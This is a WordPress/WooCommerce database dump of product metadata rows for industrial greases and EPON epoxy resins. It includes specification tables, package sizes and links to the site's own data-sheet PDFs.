INSERT INTO `wp_postmeta` VALUES (8489, 868, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8490, 868, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8491, 868, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8492, 868, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8493, 868, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8494, 868, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8495, 868, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8496, 868, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8497, 861, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8498, 877, '_edit_lock', '1481914835:2'); 
INSERT INTO `wp_postmeta` VALUES (8499, 877, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (8500, 868, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8501, 878, '_edit_lock', '1475607646:2'); 
INSERT INTO `wp_postmeta` VALUES (8502, 878, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8504, 878, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8505, 878, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8506, 878, '312_default_editor', '<table width="1047">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>NRT 8900</strong></td>\r\n<td style="text-align: center;" width="241"><strong>NRT 8904</strong></td>\r\n<td style="text-align: center;" width="213"><strong>NRT 8906</strong></td>\r\n<td style="text-align: center;" width="167"><strong>NRT 8908</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>°C</strong></td>\r\n<td style="text-align: center;">-51-121</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-260</td>\r\n<td style="text-align: center;">-40-180</td>\r\n</tr>\r\n<tr>\r\n<td><strong>°F</strong></td>\r\n<td style="text-align: center;">-69-250</td>\r\n<td style="text-align: center;">-60-354</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-40-356</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n</tr>\r\n<tr>\r\n<td><strong>ISO Viscosity</strong></td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8507, 878, '716_default_editor', '<ul>\r\n 	<li>Valves</li>\r\n 	<li>Regulators</li>\r\n 	<li>Pumps</li>\r\n 	<li>Bearings</li>\r\n 	<li>Motor Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Compressors</li>\r\n 	<li>Turbine Generators</li>\r\n 	<li>Automotive Components</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8508, 878, '719_default_editor', '<ul>\r\n 	<li>BAM</li>\r\n 	<li>BOC</li>\r\n 	<li>Air Liquide</li>\r\n 	<li>NASA</li>\r\n 	<li>General Dynamics</li>\r\n 	<li>Praxair</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8509, 878, '318_custom_list_file', 'a:1:{s:32:"b3d98ce2cb95a3204674aa4d78f511e0";a:3:{s:4:"name";s:7:"NRT SDS";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/NRTgrease.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8510, 878, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8511, 878, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8512, 878, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8513, 878, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8514, 878, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8515, 878, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8516, 878, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8517, 878, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8518, 878, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8519, 878, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8520, 878, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8521, 878, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8522, 878, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8523, 878, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8524, 878, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8525, 878, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8526, 878, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8527, 878, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8528, 878, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8529, 878, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8530, 878, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8531, 878, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8532, 878, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8533, 878, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8534, 878, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8535, 878, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8536, 878, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8537, 878, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8564, 878, '_thumbnail_id', '875'); 
INSERT INTO `wp_postmeta` VALUES (8565, 878, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8566, 878, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8567, 879, '_wp_attached_file', '2016/08/828.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8568, 880, '_edit_lock', '1475608741:2'); 
INSERT INTO `wp_postmeta` VALUES (8569, 880, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8570, 880, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8571, 880, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8572, 880, '312_default_editor', '<table width="1047">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>NRT 8900</strong></td>\r\n<td style="text-align: center;" width="241"><strong>NRT 8904</strong></td>\r\n<td style="text-align: center;" width="213"><strong>NRT 8906</strong></td>\r\n<td style="text-align: center;" width="167"><strong>NRT 8908</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>°C</strong></td>\r\n<td style="text-align: center;">-51-121</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-260</td>\r\n<td style="text-align: center;">-40-180</td>\r\n</tr>\r\n<tr>\r\n<td><strong>°F</strong></td>\r\n<td style="text-align: center;">-69-250</td>\r\n<td style="text-align: center;">-60-354</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-40-356</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n</tr>\r\n<tr>\r\n<td><strong>ISO Viscosity</strong></td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8573, 880, '716_default_editor', '<ul>\r\n 	<li>Valves</li>\r\n 	<li>Regulators</li>\r\n 	<li>Pumps</li>\r\n 	<li>Bearings</li>\r\n 	<li>Motor Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Compressors</li>\r\n 	<li>Turbine Generators</li>\r\n 	<li>Automotive Components</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8574, 880, '719_default_editor', '<ul>\r\n 	<li>BAM</li>\r\n 	<li>BOC</li>\r\n 	<li>Air Liquide</li>\r\n 	<li>NASA</li>\r\n 	<li>General Dynamics</li>\r\n 	<li>Praxair</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8575, 880, '318_custom_list_file', 'a:1:{s:32:"b3d98ce2cb95a3204674aa4d78f511e0";a:3:{s:4:"name";s:7:"NRT SDS";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/NRTgrease.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8576, 880, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8577, 880, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8578, 880, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8579, 880, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8580, 880, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8581, 880, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8582, 880, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8583, 880, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8584, 880, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8585, 880, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8586, 880, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8587, 880, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8588, 880, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8589, 880, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8590, 880, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8591, 880, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8592, 880, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8593, 880, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8594, 880, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8595, 880, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8596, 880, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8597, 880, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8598, 880, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8599, 880, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8600, 880, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8601, 880, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8602, 880, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8603, 880, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8631, 880, '_thumbnail_id', '876'); 
INSERT INTO `wp_postmeta` VALUES (8632, 880, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8633, 880, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8634, 877, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8635, 877, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8636, 877, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8637, 877, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8638, 877, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8639, 877, '318_custom_list_file', 'a:2:{s:32:"a1e7e7ba9b1b309dea80d76b27096c83";a:3:{s:4:"name";s:8:"EPON 828";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/828.pdf";s:4:"desc";s:12:"EPON 828 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8640, 877, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (8641, 877, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8642, 877, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8643, 877, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8644, 877, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8645, 877, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8646, 877, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8647, 877, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8648, 877, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8649, 877, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8650, 877, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8651, 877, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8652, 877, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8653, 877, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8654, 877, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8655, 877, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8656, 877, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8657, 877, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8658, 877, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8659, 877, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8660, 877, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8661, 877, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8662, 877, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8663, 877, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8664, 877, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8665, 877, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8666, 877, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8667, 877, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8668, 877, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8669, 877, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (8670, 881, '_edit_lock', '1475608902:2'); 
INSERT INTO `wp_postmeta` VALUES (8671, 881, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8672, 881, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8673, 881, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8674, 881, '312_default_editor', '<table width="1047">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>NRT 8900</strong></td>\r\n<td style="text-align: center;" width="241"><strong>NRT 8904</strong></td>\r\n<td style="text-align: center;" width="213"><strong>NRT 8906</strong></td>\r\n<td style="text-align: center;" width="167"><strong>NRT 8908</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>°C</strong></td>\r\n<td style="text-align: center;">-51-121</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-260</td>\r\n<td style="text-align: center;">-40-180</td>\r\n</tr>\r\n<tr>\r\n<td><strong>°F</strong></td>\r\n<td style="text-align: center;">-69-250</td>\r\n<td style="text-align: center;">-60-354</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-40-356</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n<td style="text-align: center;">1.35 g/cc @ 75°F</td>\r\n</tr>\r\n<tr>\r\n<td><strong>ISO Viscosity</strong></td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8675, 881, '716_default_editor', '<ul>\r\n 	<li>Valves</li>\r\n 	<li>Regulators</li>\r\n 	<li>Pumps</li>\r\n 	<li>Bearings</li>\r\n 	<li>Motor Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Compressors</li>\r\n 	<li>Turbine Generators</li>\r\n 	<li>Automotive Components</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8676, 881, '719_default_editor', '<ul>\r\n 	<li>BAM</li>\r\n 	<li>BOC</li>\r\n 	<li>Air Liquide</li>\r\n 	<li>NASA</li>\r\n 	<li>General Dynamics</li>\r\n 	<li>Praxair</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8677, 881, '318_custom_list_file', 'a:1:{s:32:"b3d98ce2cb95a3204674aa4d78f511e0";a:3:{s:4:"name";s:7:"NRT SDS";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/NRTgrease.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8678, 881, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8679, 881, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8680, 881, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8681, 881, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8682, 881, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8683, 881, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8684, 881, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8685, 881, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8686, 881, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8687, 881, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8688, 881, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8689, 881, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8690, 881, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8691, 881, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8692, 881, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8693, 881, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8694, 881, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8695, 881, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8696, 881, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8697, 881, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8698, 881, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8699, 881, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8700, 881, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8701, 881, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8702, 881, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8703, 881, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8704, 881, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8705, 881, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8733, 877, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8734, 881, '_thumbnail_id', '871'); 
INSERT INTO `wp_postmeta` VALUES (8735, 881, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8736, 881, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8737, 882, '_edit_lock', '1479929571:3'); 
INSERT INTO `wp_postmeta` VALUES (8738, 882, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (8739, 880, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8740, 878, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8741, 881, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8742, 883, '_wp_attached_file', '2016/08/830.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8743, 882, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8744, 882, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8745, 882, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8746, 882, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8747, 882, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8748, 882, '318_custom_list_file', 'a:2:{s:32:"4627e5b50f250640bc69a24b955368cf";a:3:{s:4:"name";s:8:"EPON 830";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/830.pdf";s:4:"desc";s:12:"EPON 830 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8749, 882, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
